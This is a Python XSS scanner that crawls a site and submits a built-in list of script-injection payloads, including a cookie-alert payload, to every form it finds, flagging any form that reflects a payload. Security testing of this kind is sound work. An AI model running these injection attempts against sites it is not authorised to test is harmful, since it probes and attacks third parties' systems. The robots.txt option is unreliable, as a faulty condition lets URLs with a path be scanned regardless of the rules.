import requests  # Importing requests library for making HTTP requests
from pprint import pprint  # Importing pprint for pretty-printing data structures
from bs4 import BeautifulSoup as bs  # Importing BeautifulSoup for HTML parsing
from urllib.parse import urljoin, urlparse  # Importing utilities for URL manipulation
from urllib.robotparser import RobotFileParser  # Importing RobotFileParser for parsing robots.txt files
from colorama import Fore, Style  # Importing colorama for colored terminal output
import argparse  # Importing argparse for command-line argument parsing

# List of XSS payloads to test forms with
XSS_PAYLOADS = [
    '"><svg/onload=alert(1)>',
    '\'><svg/onload=alert(1)>',
    '<img src=x onerror=alert(1)>',
    '"><img src=x onerror=alert(1)>',
    '\'><img src=x onerror=alert(1)>',
    "';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//--></script>",
    "<Script>alert('XSS')</scripT>",
    "<script>alert(document.cookie)</script>",
]
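
# Note: detection in scan_xss() below is reflection-based -- a form is only
# flagged when the submitted payload string comes back verbatim in the
# HTTP response body.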
# Global variable to store all crawled links
crawled_links = set()

def print_crawled_links():
    """
    Print all crawled links
    """
    print("\n[+] Links crawled:")
    for link in crawled_links:
        print(link)
    print()


# Function to get all forms from a given URL
def get_all_forms(url):
    """Given a `url`, it returns all forms from the HTML content"""
    try:
        # Using BeautifulSoup to parse the HTML content of the URL
        soup = bs(requests.get(url).content, "html.parser")
        # Finding all form elements in the HTML
        return soup.find_all("form")
    except requests.exceptions.RequestException as e:
        # Handling exceptions if there's an error in retrieving forms
        print(f"[-] Error retrieving forms from {url}: {e}")
        return []

# Function to extract details of a form
def get_form_details(form):
    """
    This function extracts all possible useful information about an HTML `form`
    """
    details = {}
    # Extracting the form action and method
    action = form.attrs.get("action", "").lower()
    method = form.attrs.get("method", "get").lower()
    inputs = []
    # Extracting input details within the form
    for input_tag in form.find_all("input"):
        input_type = input_tag.attrs.get("type", "text")
        input_name = input_tag.attrs.get("name")
        inputs.append({"type": input_type, "name": input_name})
    # Storing form details in a dictionary
    details["action"] = action
    details["method"] = method
    details["inputs"] = inputs
    return details
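
# For reference, get_form_details() returns a dict shaped like the following
# (hypothetical search form, shown purely for illustration):
# {'action': '/search', 'method': 'get',
#  'inputs': [{'type': 'text', 'name': 'q'}, {'type': 'submit', 'name': None}]}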

# Function to submit a form with a specific value
def submit_form(form_details, url, value):
    """
    Submits a form given in `form_details`
    Params:
        form_details (dict): a dictionary that contains form information
        url (str): the original URL that contains that form
        value (str): this will be replaced for all text and search inputs
    Returns the HTTP Response after form submission
    """
    target_url = urljoin(url, form_details["action"])  # Constructing the absolute form action URL
    inputs = form_details["inputs"]
    data = {}
    # Filling form inputs with the provided value
    for input_field in inputs:
        if input_field["type"] == "text" or input_field["type"] == "search":
            input_field["value"] = value
        input_name = input_field.get("name")
        input_value = input_field.get("value")
        if input_name and input_value:
            data[input_name] = input_value
    try:
        # Making the HTTP request based on the form method (POST or GET)
        if form_details["method"] == "post":
            return requests.post(target_url, data=data)
        else:
            return requests.get(target_url, params=data)
    except requests.exceptions.RequestException as e:
        # Handling exceptions if there's an error in form submission
        print(f"[-] Error submitting form to {target_url}: {e}")
        return None
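
# Example (hypothetical): for a GET form with action "/search" and a text input
# named "q" on https://example.com/, submit_form(form_details,
# "https://example.com/", payload) issues a GET request to
# https://example.com/search with q set to the payload (URL-encoded) and
# returns the resulting requests.Response.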


def get_all_links(url):
    """
    Given a `url`, it returns all links from the HTML content
    """
    try:
        # Using BeautifulSoup to parse the HTML content of the URL
        soup = bs(requests.get(url).content, "html.parser")
        # Finding all anchor elements in the HTML and resolving them to absolute URLs
        return [urljoin(url, link.get("href")) for link in soup.find_all("a")]
    except requests.exceptions.RequestException as e:
        # Handling exceptions if there's an error in retrieving links
        print(f"[-] Error retrieving links from {url}: {e}")
        return []


# Function to scan for XSS vulnerabilities
def scan_xss(args, scanned_urls=None):
    """Given a `url`, it prints all XSS vulnerable forms and
    returns True if any is vulnerable, None if already scanned, False otherwise"""
    global crawled_links
    if scanned_urls is None:
        scanned_urls = set()
    # Checking if the URL is already scanned
    if args.url in scanned_urls:
        return None
    # Adding the URL to the scanned URLs set
    scanned_urls.add(args.url)
    # Getting all forms from the given URL
    forms = get_all_forms(args.url)
    print(f"\n[+] Detected {len(forms)} forms on {args.url}")
    # Parsing the URL to get the domain
    parsed_url = urlparse(args.url)
    domain = f"{parsed_url.scheme}://{parsed_url.netloc}"
    if args.obey_robots:
        robot_parser = RobotFileParser()
        robot_parser.set_url(urljoin(domain, "/robots.txt"))
        try:
            robot_parser.read()
        except Exception as e:
            # Handling exceptions if there's an error in reading robots.txt
            print(f"[-] Error reading robots.txt file for {domain}: {e}")
            crawl_allowed = False
        else:
            crawl_allowed = robot_parser.can_fetch("*", args.url)
    else:
        crawl_allowed = True
    # Tracks whether any scanned form turned out to be vulnerable
    vulnerable = False
    if crawl_allowed or parsed_url.path:
        for form in forms:
            form_details = get_form_details(form)
            form_vulnerable = False
            # Testing each form with XSS payloads
            for payload in XSS_PAYLOADS:
                response = submit_form(form_details, args.url, payload)
                if response and payload in response.content.decode():
                    print(f"\n{Fore.GREEN}[+] XSS Vulnerability Detected on {args.url}{Style.RESET_ALL}")
                    print("[*] Form Details:")
                    pprint(form_details)
                    print(f"{Fore.YELLOW}[*] Payload: {payload}{Style.RESET_ALL}")
                    # Saving to a file if an output file is provided
                    if args.output:
                        with open(args.output, "a") as f:
                            f.write(f"URL: {args.url}\n")
                            f.write(f"Form Details: {form_details}\n")
                            f.write(f"Payload: {payload}\n")
                            f.write("-" * 50 + "\n\n")
                    form_vulnerable = True
                    vulnerable = True
                    break  # No need to try other payloads for this endpoint
            if not form_vulnerable:
                print(f"{Fore.MAGENTA}[-] No XSS vulnerability found on {args.url}{Style.RESET_ALL}")
    # Crawl links if the option is enabled
    if args.crawl:
        print(f"\n[+] Crawling links from {args.url}")
        try:
            # Crawling links from the given URL
            links = get_all_links(args.url)
        except requests.exceptions.RequestException as e:
            # Handling exceptions if there's an error in crawling links
            print(f"[-] Error crawling links from {args.url}: {e}")
            links = []
        for link in set(links):  # Removing duplicates
            if link.startswith(domain):
                crawled_links.add(link)
                if args.max_links and len(crawled_links) >= args.max_links:
                    print(f"{Fore.CYAN}[-] Maximum links ({args.max_links}) limit reached. Exiting...{Style.RESET_ALL}")
                    print_crawled_links()
                    exit(0)
                # Recursively scanning XSS vulnerabilities for crawled links
                args.url = link
                link_vulnerable = scan_xss(args, scanned_urls)
                if link_vulnerable:
                    vulnerable = True
    return vulnerable

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Extended XSS Vulnerability scanner script.")
    parser.add_argument("url", help="URL to scan for XSS vulnerabilities")
    parser.add_argument("-c", "--crawl", action="store_true", help="Crawl links from the given URL")
    # Maximum number of visited links
    parser.add_argument("-m", "--max-links", type=int, default=0, help="Maximum number of links to visit. Default 0, which means no limit.")
    parser.add_argument("--obey-robots", action="store_true", help="Obey robots.txt rules")
    parser.add_argument("-o", "--output", help="Output file to save the results")
    args = parser.parse_args()
    scan_xss(args)  # Initiating XSS vulnerability scan

    print_crawled_links()
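
# Example invocation (script name and target are hypothetical, for illustration only):
#   python xss_scanner_extended.py http://example.com -c --max-links 30 -o xss_results.txt
# This crawls same-domain links from http://example.com (stopping after 30 links),
# submits every payload in XSS_PAYLOADS to each form it finds, and appends any
# reflected hits to xss_results.txt.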